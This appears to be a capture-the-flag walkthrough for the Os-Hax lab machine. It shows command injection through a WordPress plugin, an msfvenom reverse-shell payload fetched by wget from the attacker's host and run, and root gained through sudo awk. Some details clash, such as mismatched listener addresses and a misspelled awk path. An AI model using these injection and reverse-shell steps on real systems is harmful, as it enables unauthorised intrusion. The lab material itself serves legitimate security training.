Today we are solving Os-Hax Walkthrough for and this CTF is designed by.. Rahul Gehlaut
You can download here. (Os-Hax Walkthrough)
Level: Intermediate
Boot to Root
Tool Used
- Netdiscover
- Dirb
- Nmap
- ExifTool
- Metasploit
Find of All IP We did this using the Netdiscover command
we can continue to our second step that is scanning the target With Nmap Aggressive scan
|
1 |
nmap -A 192.168.1.31 |
Type your machine IP in the web browser
Without wasting time enumerate the Directory
Enumerate the Directory With Dirb
|
1 |
dirb http://192.168.1.31 |
And Found some directory you will navigate to the following URL
|
1 |
http://192.168.1.31/img |
And Find A Our First Flag
Now Download Image file flaghost.png
Data Exfiltration-Steganography
Now After Download the image Extract-Data Image
And Find Next Hint found a directory passw@4514
After Open the directory find the Flag2.txt
Open the file Flag2.txt
And Find Brain-Fuck Encode Code
And After Decode the Coad Find A WordPress Password
Decoder Website https://www.splitbrain.org/_static/ook/
Username: web
Password: Hacker@4514
Next Step is Add a host file some Text
Vi /etc/hosts
After Add, My CTF IP and localhost Save the file
And Open Follow the URL Find a WordPress Page
|
1 |
http://localhost/wordpress |
Without waste a time open the WordPress login panel
|
1 |
http://localhost/wordpress/wp-login.php |
And login with already found password
And after login WordPress Found a vulnerable Plugin Activity Manager
And open Activity Manager tool found a command injection
Let’s Check the command
|
1 |
127.0.0.1 |id |
And this is working after the command I see the output
After Check command injection work and create our payload with Metasploit
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.2 lport=4545 -f raw
open vi editor save the output text payload.php
create a Python Server
|
1 |
python -m SimpleHTTPServer |
wget command download our payload target machine
First, remove maxlenght=15 to 100 inspect element
|
1 |
127.0.0.1 | wget http://192.168.1.2:8000/payload.php |
Execute our payload this command 127.0.0.1 | php payload.php
|
1 |
Msfconsole |
|
1 |
use exploit/multi/handler |
|
1 |
set payload php/meterpreter/reverse_tcp |
|
1 |
set lhost 192.168.1.1 |
|
1 |
set lport 4545 |
|
1 |
run |
And got a reverse connection
First import python for proper shell
|
1 |
python -c ‘import pty;pty.spawn(“/bin/bash”)’ |
|
1 |
cd /home |
|
1 |
ls |
|
1 |
cd web |
|
1 |
ls |
and I see our 3 flag
|
1 |
cat flag.txt |
Privilege Escalation
For finding the 4th flag we need to escalate root privilege, let’s identify sudo rights for Alice with the help of the following command.
|
1 |
sudo -l |
So here Alice can run awk as root without using the password and we can easily spawn root shell by exploiting this permission
|
1 |
sudo /user/bin/awk 'BEGIN {system("/bin/bash")}' |
|
1 |
id |
|
1 |
cd /root |
|
1 |
ls |
|
1 |
cat final.txt |
FLAG 4: COMPLETE! Congratulations
Author Name: Rahul Gehlaut see more blog here
